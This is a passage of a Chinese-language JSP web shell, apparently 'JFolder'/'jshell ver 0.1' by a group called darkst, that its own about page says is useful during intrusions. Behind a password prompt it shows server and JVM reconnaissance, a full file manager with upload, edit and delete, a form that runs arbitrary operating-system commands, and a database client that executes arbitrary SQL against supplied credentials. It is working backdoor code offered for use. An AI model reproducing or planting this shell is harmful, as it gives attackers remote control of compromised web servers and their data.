.table1 {BORDER:gray 0px ridge;}
.td2 {BORDER-RIGHT:#ffffff 0px solid;BORDER-TOP:#ffffff 1px solid;BORDER-LEFT:#ffffff 1px solid;BORDER-BOTTOM:#ffffff 0px solid;BACKGROUND-COLOR:lightgrey; height:18px;}
.tr1 {BACKGROUND-color:gray }
</style>
<script language="JavaScript">
<!--
function ltrim(str) {
	while (str.indexOf(0) == " ")
		str = str.substring(1);
		
	return str;
}

function changeAction(obj) {
	obj.submit();
}
//-->
</script>
<body>
<%
session.setMaxInactiveInterval(_sessionOutTime * 60);

if (request.getParameter("password") == null && session.getAttribute("password") == null) {
// show the login form
//================================================================================================
%>
<div align="center" style="position:absolute;width:100%;visibility:show; z-index:0;left:14px;top:200px">
  <TABLE class="table1" cellSpacing="1" cellPadding="1" width="473" border="0" align="center">
    <tr>
      <td class="tr1">
        <TABLE cellSpacing="0" cellPadding="0" width="468" border="0">
          <tr>
            <TD align="left"><FONT face="webdings" color="#ffffff"> 8</FONT><FONT face="Verdana, Arial, Helvetica, sans-serif" color="#ffffff"><b>管理登录 :::...</b></font></TD>
            <TD align="right"><FONT color="#d2d8ec"><b>JFolder</b>_By_<b>New4</b></FONT></TD>
          </tr>
            <form name="f1" method="post">
            <input type="hidden" name="__EVENTTARGET" value="" />
            <input type="hidden" name="__EVENTARGUMENT" value="" />
   <!--   <input type="hidden" name="__VIEWSTATE" value="dDwtMTQyNDQzOTM1NDt0PDtsPGk8OT47PjtsPHQ8cDxsPGVuY3R5cGU7PjtsPG11bHRpcGFydC9mb3JtLWRhdGE7Pj47bDxpPDE5Pjs+O2w8dDxAMDw7Ozs7Ozs7Ozs7Pjs7Pjs+Pjs+PjtsPE5ld0ZpbGU7TmV3RmlsZTtOZXdEaXJlY3Rvcnk7TmV3RGlyZWN0b3J5O0RCX3JCX01TU1FMO0RCX3JCX01TU1FMO0RCX3JCX0FjY2VzcztEQl9yQl9BY2Nlc3M7Pj7Z5iNIVOaWZWuK0pv8lCMSbhytgQ==" />
  这里不知道是什么。 -->
            <script language="javascript" type="text/javascript">
<!--
	function __doPostBack(eventTarget, eventArgument) {
		var theform;
		if (window.navigator.appName.toLowerCase().indexOf("microsoft") > -1) {
			theform = document.Form1;
		}
		else {
			theform = document.forms["Form1"];
		}
		theform.__EVENTTARGET.value = eventTarget.split("$").join(":");
		theform.__EVENTARGUMENT.value = eventArgument;
		theform.submit();
	}
// -->
</script>
            <tr>
              <td height="30" align="center" class="td2" colspan="2">
                <input name="password" type="password" class="textbox" id="Textbox" />
                <input type="submit" name="Button" value="Login" id="Button" title="Click here to login" class="button" />
              </td>
            </tr>
          </form>
          
      </TABLE></td>
    </tr>
  </TABLE>
</div>
<%
//================================================================================================
// end of the login form
} else {
	String password = null;
	
	if (session.getAttribute("password") == null) {
		password = (String)request.getParameter("password");
		
		if (validate(password) == false) {
			out.println("<div align=\"center\"><font color=\"red\"><li>哎呀，倒霉死啦!</font></div>");
			out.close();
			return;
		}
		
		session.setAttribute("password", password);
	} else {
		password = (String)session.getAttribute("password");
	}
	
	String action = null;
	

	if (request.getParameter("action") == null)
		action = "main";
	else 
		action = (String)request.getParameter("action");
		
	if (action.equals("exit")) {
		session.removeAttribute("password");
		response.sendRedirect(request.getRequestURI());
		out.close();
		return;
	}

// show the main menu
//====================================================================================
%>
<table align="center" width="600" border="0" cellpadding="2" cellspacing="0">
	<form name="form1" method="get">
	<tr bgcolor="#CCCCCC">
		<td id="title"><!--[程序首页]--></td>
		<td align="right">
			<select name="action" onChange="javascript:changeAction(document.form1)">
				<option value="main">程序首页</option>
				<option value="filesystem">文件系统</option>
				<option value="command">系统命令</option>
				<option value="database">数据库</option>
				<option value="config">程序配置</option>
				<option value="about">关于程序</option>
				<option value="exit">退出程序</option>
			</select>
<script language="JavaScript">
<%
	out.println("var action = \"" + action + "\"");
%>
var sAction = document.form1.action;
for (var i = 0; i < sAction.length; i ++) {
	if (sAction[i].value == action) {
		sAction[i].selected = true;
		//title.innerHTML = "[" + sAction[i].innerHTML + "]";
	}
}
</script>
		</td>
	</tr>
	</form>
</table>
<%
//=====================================================================================
// end of main menu

	if (action.equals("main")) {
// print the system info table
//=======================================================================================
%>
<table align="center" width="600" cellpadding="2" cellspacing="1" border="0" bgcolor="#CCCCCC">
	<tr bgcolor="#FFFFFF">
		<td colspan="2" align="center">服务器信息</td>
	</tr>
	<tr bgcolor="#FFFFFF">
		<td width="300" align="center" class="datarows">服务器名</td>
		<td align="center" class="datarows"><%=request.getServerName()%></td>
	</tr>
	<tr bgcolor="#FFFFFF">
		<td width="300" align="center" class="datarows">服务器端口</td>
		<td align="center" class="datarows"><%=request.getServerPort()%></td>
	</tr>
	<tr bgcolor="#FFFFFF">
		<td width="300" align="center" class="datarows">操作系统</td>
		<td align="center" class="datarows"><%=System.getProperty("os.name") + " " + System.getProperty("os.version") + " " + System.getProperty("os.arch")%></td>
	</tr>
	<tr bgcolor="#FFFFFF">
		<td width="300" align="center" class="datarows">当前用户名</td>
		<td align="center" class="datarows"><%=System.getProperty("user.name")%></td>
	</tr>
	<tr bgcolor="#FFFFFF">
		<td width="300" align="center" class="datarows">当前用户目录</td>
		<td align="center" class="datarows"><%=System.getProperty("user.home")%></td>
	</tr>
	<tr bgcolor="#FFFFFF">
		<td width="300" align="center" class="datarows">当前用户工作目录</td>
		<td align="center" class="datarows"><%=System.getProperty("user.dir")%></td>
	</tr>
	<tr bgcolor="#FFFFFF">
		<td width="300" align="center" class="datarows">程序相对路径</td>
		<td align="center" class="datarows"><%=request.getRequestURI()%></td>
	</tr>
	<tr bgcolor="#FFFFFF">
		<td width="300" align="center" class="datarows">程序绝对路径</td>
		<td align="center" class="datarows"><%=request.getRealPath(request.getServletPath())%></td>
	</tr>
	<tr bgcolor="#FFFFFF">
		<td width="300" align="center" class="datarows">网络协议</td>
		<td align="center" class="datarows"><%=request.getProtocol()%></td>
	</tr>
	<tr bgcolor="#FFFFFF">
		<td width="300" align="center" class="datarows">服务器软件版本信息</td>
		<td align="center" class="datarows"><%=application.getServerInfo()%></td>
	</tr>
	<tr bgcolor="#FFFFFF">
		<td width="300" align="center" class="datarows">JDK版本</td>
		<td align="center" class="datarows"><%=System.getProperty("java.version")%></td>
	</tr>
	<tr bgcolor="#FFFFFF">
		<td width="300" align="center" class="datarows">JDK安装路径</td>
		<td align="center" class="datarows"><%=System.getProperty("java.home")%></td>
	</tr>
	<tr bgcolor="#FFFFFF">
		<td width="300" align="center" class="datarows">JAVA虚拟机版本</td>
		<td align="center" class="datarows"><%=System.getProperty("java.vm.specification.version")%></td>
	</tr>
	<tr bgcolor="#FFFFFF">
		<td width="300" align="center" class="datarows">JAVA虚拟机名</td>
		<td align="center" class="datarows"><%=System.getProperty("java.vm.name")%></td>
	</tr>
	<tr bgcolor="#FFFFFF">
		<td width="300" align="center" class="datarows">JAVA类路径</td>
		<td align="center" class="datarows"><%=System.getProperty("java.class.path")%></td>
	</tr>
	<tr bgcolor="#FFFFFF">
		<td width="300" align="center" class="datarows">JAVA载入库搜索路径</td>
		<td align="center" class="datarows"><%=System.getProperty("java.library.path")%></td>
	</tr>
	<tr bgcolor="#FFFFFF">
		<td width="300" align="center" class="datarows">JAVA临时目录</td>
		<td align="center" class="datarows"><%=System.getProperty("java.io.tmpdir")%></td>
	</tr>
	<tr bgcolor="#FFFFFF">
		<td width="300" align="center" class="datarows">JIT编译器名</td>
		<td align="center" class="datarows"><%=System.getProperty("java.compiler") == null ? "" : System.getProperty("java.compiler")%></td>
	</tr>
	<tr bgcolor="#FFFFFF">
		<td width="300" align="center" class="datarows">扩展目录路径</td>
		<td align="center" class="datarows"><%=System.getProperty("java.ext.dirs")%></td>
	</tr>
	<tr bgcolor="#FFFFFF">
		<td colspan="2" align="center">客户端信息</td>
	</tr>
	<tr bgcolor="#FFFFFF">
		<td width="300" align="center" class="datarows">客户机地址</td>
		<td align="center" class="datarows"><%=request.getRemoteAddr()%></td>
	</tr>
	<tr bgcolor="#FFFFFF">
		<td width="300" align="center" class="datarows">服务机器名</td>
		<td align="center" class="datarows"><%=request.getRemoteHost()%></td>
	</tr>
	<tr bgcolor="#FFFFFF">
		<td width="300" align="center" class="datarows">用户名</td>
		<td align="center" class="datarows"><%=request.getRemoteUser() == null ? "" : request.getRemoteUser()%></td>
	</tr>
	<tr bgcolor="#FFFFFF">
		<td width="300" align="center" class="datarows">请求方式</td>
		<td align="center" class="datarows"><%=request.getScheme()%></td>
	</tr>
	<tr bgcolor="#FFFFFF">
		<td width="300" align="center" class="datarows">应用安全套接字层</td>
		<td align="center" class="datarows"><%=request.isSecure() == true ? "是" : "否"%></td>
	</tr>
</table>
<%
//=======================================================================================
// end of printing the system info table
/////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
	} else if (action.equals("filesystem")) {
		String curPath = "";
		String result = "";
		String fsAction = "";
		
		if (request.getParameter("curPath") == null) {
			curPath = request.getRealPath(request.getServletPath());
			curPath = pathConvert((new File(curPath)).getParent());
		} else {
			curPath = Unicode2GB((String)request.getParameter("curPath"));
		}
		
		if (request.getParameter("fsAction") == null) {
			fsAction = "list";
		} else {
			fsAction = (String)request.getParameter("fsAction");
		}
		
		if (fsAction.equals("list"))
			result = listFiles(curPath, request.getRequestURI() + "?action=" + action);
		else if (fsAction.equals("browse")) {
			result = listFiles(new File(curPath).getParent(), request.getRequestURI() + "?action=" + action);
			result += browseFile(curPath);
		}
		else if (fsAction.equals("open"))
			result = openFile(curPath, request.getRequestURI() + "?action=" + action);
		else if (fsAction.equals("save")) {
			if (request.getParameter("fileContent") == null) {
				result = "<font color=\"red\">页面导航错误</font>";
			} else {
				String fileContent = Unicode2GB((String)request.getParameter("fileContent"));
				result = saveFile(curPath, request.getRequestURI() + "?action=" + action, fileContent);
			}
		} else if (fsAction.equals("createFolder")) {
			if (request.getParameter("folderName") == null) {
				result = "<font color=\"red\">目录名不能为空</font>";
			} else {
				String folderName = Unicode2GB(request.getParameter("folderName").trim());
				if (folderName.equals("")) {
					result = "<font color=\"red\">目录名不能为空</font>"; 
				} else {
					result = createFolder(curPath, request.getRequestURI() + "?action=" + action, folderName);
				}
			}
		} else if (fsAction.equals("createFile")) {
			if (request.getParameter("fileName") == null) {
				result = "<font color=\"red\">文件名不能为空</font>";
			} else {
				String fileName = Unicode2GB(request.getParameter("fileName").trim());
				if (fileName.equals("")) {
					result = "<font color=\"red\">文件名不能为空</font>";
				} else {
					result = createFile(curPath, request.getRequestURI() + "?action=" + action, fileName);
				}
			}
		} else if (fsAction.equals("deleteFile")) {
			if (request.getParameter("filesDelete") == null) {
				result = "<font color=\"red\">没有选择要删除的文件</font>";
			} else {
				String[] files2Delete = (String[])request.getParameterValues("filesDelete");
				if (files2Delete.length == 0) {
					result = "<font color=\"red\">没有选择要删除的文件</font>";
				} else {
					for (int n = 0; n < files2Delete.length; n ++) {
						files2Delete[n] = Unicode2GB(files2Delete[n]);
					}
					result = deleteFile(curPath, request.getRequestURI() + "?action=" + action, files2Delete);
				}
			}
		} else if (fsAction.equals("saveAs")) {
			if (request.getParameter("fileContent") == null) {
				result = "<font color=\"red\">页面导航错误</font>";
			} else {
				String fileContent = Unicode2GB(request.getParameter("fileContent"));
				result = saveAs(curPath, request.getRequestURI() + "?action=" + action, fileContent);
			}
		} else if (fsAction.equals("upload")) {
			result = uploadFile(request, curPath, request.getRequestURI() + "?action=" + action);
		} else if (fsAction.equals("copyto")) {
			if (request.getParameter("filesDelete") == null || request.getParameter("dstPath") == null) {
				result = "<font color=\"red\">没有选择要复制的文件</font>";
			} else {
				String[] files2Copy = request.getParameterValues("filesDelete");
				String dstPath = request.getParameter("dstPath").trim();
				if (files2Copy.length == 0) {
					result = "<font color=\"red\">没有选择要复制的文件</font>";
				} else if (dstPath.equals("")) {
					result = "<font color=\"red\">没有填写要复制到的目录路径</font>";
				} else {
					for (int i = 0; i < files2Copy.length; i ++)
						files2Copy[i] = Unicode2GB(files2Copy[i]);
					
					result = copyFiles(curPath, request.getRequestURI() + "?action=" + action, files2Copy, Unicode2GB(dstPath));
				}
			}
		} else if (fsAction.equals("rename")) {
			if (request.getParameter("fileRename") == null) {
				result = "<font color=\"red\">页面导航错误</font>";
			} else {
				String file2Rename = request.getParameter("fileRename").trim();
				String newName = request.getParameter("newName").trim();
				if (file2Rename.equals("")) {
					result = "<font color=\"red\">没有选择要重命名的文件</font>";
				} else if (newName.equals("")) {
					result = "<font color=\"red\">没有填写新文件名</font>";
				} else {
					result = renameFile(curPath, request.getRequestURI() + "?action=" + action, Unicode2GB(file2Rename), Unicode2GB(newName));
				}			
			}
		}
%>
<table align="center" width="600" border="0" cellpadding="2" cellspacing="1" bgcolor="#CCCCCC">
	<form method="post" name="form2" action="<%= request.getRequestURI() + "?action=" + action%>">
	<tr bgcolor="#FFFFFF">
		<td align="center">地址  <input type="text" size="80" name="curPath" class="textbox" value="<%=curPath%>" />
											 <input type="submit" value="转到" class="button" /></td>
	</tr>
	</form>
	<tr bgcolor="#FFFFFF">
		<td><%= result.trim().equals("")?"&nbsp;" : result%></td>
	</tr>
</table>
<%		
/////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
	} else if (action.equals("command")) {
		String cmd = "";
		InputStream ins = null;
		String result = "";
		
		if (request.getParameter("command") != null) {		
			cmd = (String)request.getParameter("command");
			result = exeCmd(cmd);
		}
// print the command form
//========================================================================================
%>
<table border="0" width="600" cellpadding="2" cellspacing="1" bgcolor="#CCCCCC" align="center">
	<form name="form2" method="post" action="<%=request.getRequestURI() + "?action=" + action%>">
	<tr bgcolor="#FFFFFF">
		<td align="center">执行命令</td>
	</tr>
	<tr bgcolor="#FFFFFF">
		<td align="center">
			<input type="text" class="textbox" size="80" name="command" value="<%=cmd%>" />
			<input type="submit" class="button" value="执行" />
		</td>
	</tr>
	<tr bgcolor="#FFFFFF">
		<td align="center">执行结果</td>
	</tr>
	</form>
</table>
<table align="center" width="600" border="0">
	<tr>
		<td><%=result == "" ? "&nbsp;" : result%></td>
	</tr>
</table>
<%
//=========================================================================================
// end of printing command form
///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
	} else if (action.equals("database")) {
		String dbAction = "";
		String result = "";
		String dbType = "";
		String dbServer = "";
		String dbPort = "";
		String dbUsername = "";
		String dbPassword = "";
		String dbName = "";
		String dbResult = "";
		String sql = "";
		
		if (request.getParameter("dbAction") == null) {
			dbAction = "main";
		} else {
			dbAction = request.getParameter("dbAction").trim();
			if (dbAction.equals(""))
				dbAction = "main";
		}
		
		if (dbAction.equals("main")) {
			result = "&nbsp;";
		} else if (dbAction.equals("dbConnect")) {
			if (request.getParameter("dbType") == null ||
				request.getParameter("dbServer") == null ||
				request.getParameter("dbPort") == null ||
				request.getParameter("dbUsername") == null ||
				request.getParameter("dbPassword") == null ||
				request.getParameter("dbName") == null) {
				response.sendRedirect(request.getRequestURI() + "?action=" + action);
			} else {
				dbType = request.getParameter("dbType").trim();
				dbServer = request.getParameter("dbServer").trim();
				dbPort = request.getParameter("dbPort").trim();
				dbUsername = request.getParameter("dbUsername").trim();
				dbPassword = request.getParameter("dbPassword").trim();
				dbName = request.getParameter("dbName").trim();
				
				if (DBInit(dbType, dbServer, dbPort, dbUsername, dbPassword, dbName)) {
					if (DBConnect(dbUsername, dbPassword)) {
						if (request.getParameter("sql") != null) {
							sql = request.getParameter("sql").trim();
							if (! sql.equals("")) {
								dbResult = DBExecute(sql);
							}
						}
						
						result =  "<script language=\"javascript\">\n";
						result += "<!--\n";
						result += "function exeSql() {\n";
						result += "    if (ltrim(document.dbInfo.sql.value) != \"\")\n";
						result += "        document.dbInfo.submit();";
						result += "}\n";
						result += "\n";
						result += "function resetIt() {\n";
						result += "	   document.dbInfo.sql.value = \"\";";
						result += "}\n";
						result += "//-->\n";
						result += "</script>\n";
						result += "sql语句<br/><textarea name=\"sql\" cols=\"70\" rows=\"6\">" + sql + "</textarea><br/><input type=\"submit\" class=\"button\" onclick=\"javascript:exeSql()\" value=\"执行\"/>&nbsp;<input type=\"reset\" class=\"button\" onclick=\"javascript:resetIt()\" value=\"清空\"/>\n";
						
						DBRelease();
					} else {
						result = "<font color=\"red\">数据库连接失败</font>";
					}
				} else {
					result = "<font color=\"red\">数据库连接驱动没有找到</font>";
				}				
			}
		}
%>
<script language="javascript">
<!--
<%
out.println("var selectedType = \"" + dbType + "\";");
%>
//-->
</script>
<table align="center" width="600" border="0" cellpadding="2" cellspacing="1" bgcolor="#CCCCCC">
	<form name="dbInfo" method="post" action="<%=request.getRequestURI() + "?action=" + action + "&dbAction=dbConnect"%>">
	<tr bgcolor="#FFFFFF">
		<td width="300" align="center">数据库连接类型</td>
		<td align="center">
			<select name="dbType">
				<option value="sqlserver">SQLServer数据库</option>
				<option value="mysql">MySql数据库</option>
				<option value="oracle">Oracle数据库</option>
				<option value="db2">DB2数据库</option>
				<option value="odbc">ODBC数据源</option>
			</select>
			<script language="javascript">
			for (var i = 0; i < document.dbInfo.dbType.options.length; i ++) {
				if (document.dbInfo.dbType.options[i].value == selectedType) {
					document.dbInfo.dbType.options[i].selected = true;
				}
			}
			</script>
		</td>
	</tr>
	<tr bgcolor="#FFFFFF">
		<td align="center">数据库服务器地址</td>
		<td align="center"><input type="text" name="dbServer" class="textbox" value="<%=dbServer%>" style="width:150px;" /></td>
	</tr>
	<tr bgcolor="#FFFFFF">
		<td align="center">数据库服务器端口</td>
		<td align="center"><input type="text" name="dbPort" class="textbox" value="<%=dbPort%>" style="width:150px;" /></td>
	</tr>
	<tr bgcolor="#FFFFFF">
		<td align="center">数据库用户名</td>
		<td align="center"><input type="text" name="dbUsername" class="textbox" value="<%=dbUsername%>" size="20" style="width:150px;" /></td>
	</tr>
	<tr bgcolor="#FFFFFF">
		<td align="center">数据库密码</td>
		<td align="center"><input type="password" name="dbPassword" class="textbox" value="<%=dbPassword%>" size="20" style="width:150px;" /></td>
	</tr>
	<tr bgcolor="#FFFFFF">
		<td align="center">数据库名</td>
		<td align="center"><input type="text" name="dbName" class="textbox" value="<%=dbName%>" size="20" style="width:150px;" /></td>
	</tr>
	<tr bgcolor="#FFFFFF">
		<td align="center" colspan="2"><input type="submit" value="连接" class="button" /> <input type="reset" value="重置" class="button" /></td>
	</tr>
	<tr bgcolor="#FFFFFF">
		<td align="center" colspan="2"><%=result%></td>
	</tr>
	</form>
</table>
<table align="center" width="100%" border="0">
	<tr>
		<td align="center">
			<%=dbResult%>
		</td>
	</tr>
</table>
<%		

////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////		
	} else if (action.equals("config")) {
		String cfAction = "";
		int i;
		
		if (request.getParameter("cfAction") == null) {

			cfAction = "main";
		} else {
			cfAction = request.getParameter("cfAction").trim();
			if (cfAction.equals(""))
				cfAction = "main";
		}
		
		if (cfAction.equals("main")) {
// start of config form
//==========================================================================================
%>
<script language="javascript">
<!--
function delFileType() {
	document.config.newType.value = document.config.textFileTypes[document.config.textFileTypes.selectedIndex].value;
	document.config.textFileTypes.options.remove(document.config.textFileTypes.selectedIndex);
}

function addFileType() {
	if (document.config.newType.value != "") {
		var oOption = document.createElement("OPTION");
		document.config.textFileTypes.options.add(oOption);
		oOption.value = document.config.newType.value;
		oOption.innerHTML = document.config.newType.value;
	}
}

function selectAllTypes() {
	for (var i = 0; i < document.config.textFileTypes.options.length; i ++) {
		document.config.textFileTypes.options[i].selected = true;
	}
}
//-->
</script>
<table align="center" width="600" border="0" cellpadding="2" cellspacing="1" bgcolor="#CCCCCC">
	<form name="config" method="post" action="<%=request.getRequestURI() + "?action=config&cfAction=save"%>" onSubmit="javascript:selectAllTypes()">
	<tr bgcolor="#FFFFFF">
		<td align="center" width="200">密码</td>
		<td><input type="text" size="30" name="password" class="textbox" value="<%=_password%>" /></td>
	</tr>
	<tr bgcolor="#FFFFFF">
		<td align="center">系统编码</td>
		<td><input type="text" size="30" name="encode" value="<%=_encodeType%>" class="textbox" /></td>
	</tr>
	<tr bgcolor="#FFFFFF">
		<td align="center">Session超时时间</td>
		<td><input type="text" size="5" name="sessionTime" class="textbox" value="<%=_sessionOutTime%>" /></td>
	</tr>
	<tr bgcolor="#FFFFFF">
		<td align="center">可编辑文件类型</td>
		<td>
			<table border="0" width="190" cellpadding="0" cellspacing="0">
				<tr>
					<td>
						<input type="text" size="11" class="textbox" name="newType" />
					</td>
					<td align="center">
						<input type="button" onClick="javascript:delFileType()" value="<<" class="button" />
						<p></p>
						<input type="button" value=">>" onClick="javascript:addFileType()" class="button" />
					</td>
					<td align="right">	
						<select name="textFileTypes" size="4" style="width: 87px" multiple="true">  
<%
		for (i = 0; i < _textFileTypes.length; i ++) {
%>
							<option value="<%=_textFileTypes[i]%>"><%=_textFileTypes[i]%></option>
<%
 		}
%>
						</select>
					</td>
				</tr>
			</table>
		</td>
	</tr>
	<tr bgcolor="#FFFFFF">
		<td align="center" colspan="2"><input type="submit" value="保存" class="button" /></td>
	</tr>
	</form>
</table>
<%
		} else if (cfAction.equals("save")) {
			if (request.getParameter("password") == null || 
				request.getParameter("encode") == null || 
				request.getParameter("sessionTime") == null ||
				request.getParameterValues("textFileTypes") == null) {
				response.sendRedirect(request.getRequestURI());
			}
			
			String result = "";
			
			String newPassword = request.getParameter("password").trim();
			String newEncodeType = request.getParameter("encode").trim();
			String newSessionTime = request.getParameter("sessionTime").trim();
			String[] newTextFileTypes = request.getParameterValues("textFileTypes");
			String jshellPath = request.getRealPath(request.getServletPath());
			
			try {
				JshellConfig jconfig = new JshellConfig(jshellPath);
				jconfig.setPassword(newPassword);
				jconfig.setEncodeType(newEncodeType);
				jconfig.setSessionTime(newSessionTime);
				jconfig.setTextFileTypes(newTextFileTypes);
				jconfig.save();
				result += "设置保存成功，正在返回，请稍候……";
				result += "<meta http-equiv=\"refresh\" content=\"2;url=" + request.getRequestURI() + "?action=" + request.getParameter("action") + "\">";
			} catch (JshellConfigException e) {
				result = "<font color=\"red\">" + e.getMessage() + "</font>"; 
			}

%>
<table align="center" width="600" border="0" cellpadding="2" cellspacing="1" bgcolor="#CCCCCC">
	<tr bgcolor="#FFFFFF">
		<td><%=result == "" ? "&nbsp;" : result%></td>
	</tr>
</table>
<%
		}
//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
//==========================================================================================
// end of config form
	} else if (action.equals("about")) {
// start of about
//==========================================================================================
%>
<table border="0" align="center" width="600" cellpadding="2" cellspacing="1" bgcolor="#CCCCCC">
	<tr bgcolor="#FFFFFF">
		<td align="center">关于 jshell ver 0.1</td>
	</tr>
	<tr bgcolor="#FFFFFF">
		<td>    增加了显示alxea排名的功能，这对于入侵中也比较方便些，版权还是归作者的.</td>
	</tr>
	<tr bgcolor="#FFFFFF">
		<td align="right">darkst by <a href="mailto:376186027@qq.com">New4</a> and welcome to <a href="http://www.darkst.com" target="_blank">暗组技术联盟</a></td>
	</tr>
</table>
<%	
//==========================================================================================
	}
}
%>
</body>
</html>